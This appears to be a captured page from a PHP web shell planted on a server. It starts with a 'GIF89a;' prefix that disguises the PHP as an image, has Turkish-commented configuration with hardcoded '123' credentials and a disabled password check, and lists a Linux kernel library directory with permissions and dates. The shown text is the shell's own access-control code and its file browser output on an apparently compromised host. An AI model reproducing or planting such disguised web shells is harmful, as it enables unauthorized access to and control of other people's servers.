GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| 842 | --- | October 03 2025 06:39:56. | 0755 | ||
| crypto | --- | October 03 2025 06:39:56. | 0755 | ||
| dim | --- | October 03 2025 06:39:56. | 0755 | ||
| fonts | --- | October 03 2025 06:39:56. | 0755 | ||
| kunit | --- | October 03 2025 06:39:56. | 0755 | ||
| livepatch | --- | October 03 2025 06:39:56. | 0755 | ||
| lz4 | --- | October 03 2025 06:39:56. | 0755 | ||
| lzo | --- | October 03 2025 06:39:56. | 0755 | ||
| math | --- | October 03 2025 06:39:56. | 0755 | ||
| mpi | --- | October 03 2025 06:39:56. | 0755 | ||
| pldmfw | --- | October 03 2025 06:39:56. | 0755 | ||
| raid6 | --- | October 03 2025 06:39:56. | 0755 | ||
| reed_solomon | --- | October 03 2025 06:39:56. | 0755 | ||
| vdso | --- | October 03 2025 06:39:56. | 0755 | ||
| xz | --- | October 03 2025 06:39:56. | 0755 | ||
| zlib_deflate | --- | October 03 2025 06:39:56. | 0755 | ||
| zlib_dfltcc | --- | October 03 2025 06:39:56. | 0755 | ||
| zlib_inflate | --- | October 03 2025 06:39:56. | 0755 | ||
| zstd | --- | October 03 2025 06:39:56. | 0755 | ||
| Kconfig | 16.17 KB | August 22 2025 07:58:05. | 0644 | ||
| Kconfig.debug | 86.62 KB | August 22 2025 07:58:05. | 0644 | ||
| Kconfig.kasan | 7.25 KB | October 31 2021 20:53:10. | 0644 | ||
| Kconfig.kcsan | 9.46 KB | October 31 2021 20:53:10. | 0644 | ||
| Kconfig.kfence | 3.57 KB | August 22 2025 07:58:05. | 0644 | ||
| Kconfig.kgdb | 5.57 KB | October 31 2021 20:53:10. | 0644 | ||
| Kconfig.ubsan | 5.67 KB | August 22 2025 07:58:05. | 0644 | ||
| Makefile | 12.06 KB | August 22 2025 07:58:05. | 0644 |